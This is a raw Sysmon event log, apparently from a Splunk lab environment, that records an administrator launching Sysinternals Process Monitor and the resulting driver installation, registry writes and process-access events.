C:\Users\Administrator\Downloads\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32HighMD5=E9A8F5331FC1D56266BC53E3D43DF87A,SHA256=72393BD30B38F7C6BD64786AB0AA537BF92DAAC3C01D69B64F4E20908E8C0F0E,IMPHASH=05011356590A9B30BA8BB6FC193386C0{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\explorer.exeC:\Windows\Explorer.EXE /NOUACCHECK 23542300x8000000000000000288665Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:55.120{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\yap1cmsg.default-release\prefs-1.jsMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000288704Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:56.960{C8EA50B7-11CB-6216-2005-000000003802}23281200C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+535ce|C:\Windows\System32\SHELL32.dll+848f2|C:\Users\Administrator\Downloads\Procmon64.exe+6e2ce|C:\Users\Administrator\Downloads\Procmon64.exe+9dac9|C:\Users\Administrator\Downloads\Procmon64.exe+b2dc6|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288703Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:56.960{C8EA50B7-11CB-6216-2005-000000003802}23281200C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+53538|C:\Windows\System32\SHELL32.dll+848f2|C:\Users\Administrator\Downloads\Procmon64.exe+6e2ce|C:\Users\Administrator\Downloads\Procmon64.exe+9dac9|C:\Users\Administrator\Downloads\Procmon64.exe+b2dc6|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288702Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:56.960{C8EA50B7-11CB-6216-2005-000000003802}23281200C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+5351a|C:\Windows\System32\SHELL32.dll+848f2|C:\Users\Administrator\Downloads\Procmon64.exe+6e2ce|C:\Users\Administrator\Downloads\Procmon64.exe+9dac9|C:\Users\Administrator\Downloads\Procmon64.exe+b2dc6|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288701Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:56.960{C8EA50B7-11CB-6216-2005-000000003802}23281200C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+5351a|C:\Windows\System32\SHELL32.dll+848f2|C:\Users\Administrator\Downloads\Procmon64.exe+6e2ce|C:\Users\Administrator\Downloads\Procmon64.exe+9dac9|C:\Users\Administrator\Downloads\Procmon64.exe+b2dc6|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288700Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:56.959{C8EA50B7-11CB-6216-2005-000000003802}23281200C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\System32\SHELL32.dll+d15fa|C:\Windows\System32\SHELL32.dll+84bc4|C:\Windows\System32\SHELL32.dll+84818|C:\Users\Administrator\Downloads\Procmon64.exe+6e2ce|C:\Users\Administrator\Downloads\Procmon64.exe+9dac9|C:\Users\Administrator\Downloads\Procmon64.exe+b2dc6|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288699Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:56.958{C8EA50B7-11CB-6216-2005-000000003802}23281200C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+d15e8|C:\Windows\System32\SHELL32.dll+84bc4|C:\Windows\System32\SHELL32.dll+84818|C:\Users\Administrator\Downloads\Procmon64.exe+6e2ce|C:\Users\Administrator\Downloads\Procmon64.exe+9dac9|C:\Users\Administrator\Downloads\Procmon64.exe+b2dc6|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288698Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:56.958{C8EA50B7-11CB-6216-2005-000000003802}23281200C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+d15e8|C:\Windows\System32\SHELL32.dll+84bc4|C:\Windows\System32\SHELL32.dll+84818|C:\Users\Administrator\Downloads\Procmon64.exe+6e2ce|C:\Users\Administrator\Downloads\Procmon64.exe+9dac9|C:\Users\Administrator\Downloads\Procmon64.exe+b2dc6|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000288697Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1042SetValue2022-02-23 10:51:56.958{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exeHKU\S-1-5-21-1032146228-2128790581-2941542908-500_Classes\ProcMon.Logfile.1\shell\open\command\(Default)"C:\Users\Administrator\Downloads\Procmon64.exe" /OpenLog "%%1" 10341000x8000000000000000288696Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:56.955{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000288695Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localAlert,Sysinternals Tool UsedSetValue2022-02-23 10:51:56.954{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exeHKU\S-1-5-21-1032146228-2128790581-2941542908-500\SOFTWARE\Sysinternals\Process Monitor\EulaAcceptedDWORD (0x00000001) 23542300x8000000000000000288694Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:56.908{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7D0ECF39F4EC15B8E49AEB4F4A2D1D15,SHA256=EC0AB4406B43537DDC1E4BFA7C1FD75661555236BB2BA59CCAF5B479FCAA5ADB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216884Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:51:56.170{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F38D6D42BDCABDCBEA6FC337B315168E,SHA256=51B1A9B9868087377669EE8F1838339B7D060AB6A0091FD982CA1AB689623464,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000288693Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:56.269{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D8376B8B6DADE47F56B40D2923682FBA,SHA256=F9CD23D0FACEE9A69B0D24E328588F060AA630CF98AE5ECD1AD8B92AB6742386,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216885Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:51:57.186{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F85E357B3E7414C6DB6CC2CB38FB9742,SHA256=6ABFB87ED42E637DEB92FA06006443A0C3A7CC7AD32C4F3D5505F5985E138156,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000288740Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:57.788{C8EA50B7-F11F-6215-1000-000000003802}3641580C:\Windows\system32\svchost.exe{C8EA50B7-11CD-6216-2105-000000003802}516C:\Windows\system32\DllHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288739Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:57.788{C8EA50B7-F11F-6215-1000-000000003802}3641376C:\Windows\system32\svchost.exe{C8EA50B7-11CD-6216-2105-000000003802}516C:\Windows\system32\DllHost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288738Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:57.760{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-11CD-6216-2105-000000003802}516C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288737Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:57.726{C8EA50B7-F2AA-6215-B100-000000003802}22443360C:\Windows\system32\csrss.exe{C8EA50B7-11CD-6216-2105-000000003802}516C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000288736Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:57.703{C8EA50B7-F11C-6215-0500-000000003802}412428C:\Windows\system32\csrss.exe{C8EA50B7-11CD-6216-2105-000000003802}516C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000288735Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:57.700{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-11CD-6216-2105-000000003802}516C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+366d9|c:\windows\system32\rpcss.dll+3bec2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000288734Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:55.497{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53491-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 10341000x8000000000000000288733Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:57.254{C8EA50B7-F11D-6215-0B00-000000003802}6281356C:\Windows\system32\lsass.exe{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288732Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:57.254{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 12241200x8000000000000000288731Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050DeleteValue2022-02-23 10:51:57.242{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exeHKLM\System\CurrentControlSet\Services\PROCMON24\ImagePath 12241200x8000000000000000288730Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050DeleteValue2022-02-23 10:51:57.242{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exeHKLM\System\CurrentControlSet\Services\PROCMON24\Start 12241200x8000000000000000288729Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-DeleteValue2022-02-23 10:51:57.242{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exeHKLM\System\CurrentControlSet\Services\PROCMON24\ErrorControl 12241200x8000000000000000288728Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-DeleteValue2022-02-23 10:51:57.242{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exeHKLM\System\CurrentControlSet\Services\PROCMON24\Type 13241300x8000000000000000288727Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 10:51:57.229{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exeHKLM\System\CurrentControlSet\Services\PROCMON24\Instances\Process Monitor 24 Instance\FlagsDWORD (0x00000000) 13241300x8000000000000000288726Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 10:51:57.229{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exeHKLM\System\CurrentControlSet\Services\PROCMON24\Instances\Process Monitor 24 Instance\Altitude385200 13241300x8000000000000000288725Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 10:51:57.229{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exeHKLM\System\CurrentControlSet\Services\PROCMON24\Instances\DefaultInstanceProcess Monitor 24 Instance 13241300x8000000000000000288724Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 10:51:57.229{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exeHKLM\System\CurrentControlSet\Services\PROCMON24\SupportedFeaturesDWORD (0x0009c26c) 13241300x8000000000000000288723Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:51:57.229{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exeHKLM\System\CurrentControlSet\Services\PROCMON24\ImagePath\??\C:\Windows\system32\Drivers\PROCMON24.SYS 13241300x8000000000000000288722Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:51:57.229{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exeHKLM\System\CurrentControlSet\Services\PROCMON24\StartDWORD (0x00000003) 13241300x8000000000000000288721Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 10:51:57.229{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exeHKLM\System\CurrentControlSet\Services\PROCMON24\ErrorControlDWORD (0x00000001) 13241300x8000000000000000288720Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 10:51:57.229{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exeHKLM\System\CurrentControlSet\Services\PROCMON24\TypeDWORD (0x00000002) 10341000x8000000000000000288719Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:57.228{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x8000000000000000288718Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:57.227{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exeC:\Windows\System32\drivers\PROCMON24.SYS2022-02-23 10:51:57.227 10341000x8000000000000000288717Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:57.187{C8EA50B7-F2AD-6215-C000-000000003802}48561964C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+617df|C:\Windows\System32\SHELL32.dll+63325|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288716Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:57.186{C8EA50B7-F2AD-6215-C000-000000003802}48561964C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6323e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288715Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:57.186{C8EA50B7-F2AD-6215-C000-000000003802}48561964C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61a34|C:\Windows\System32\SHELL32.dll+63207|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 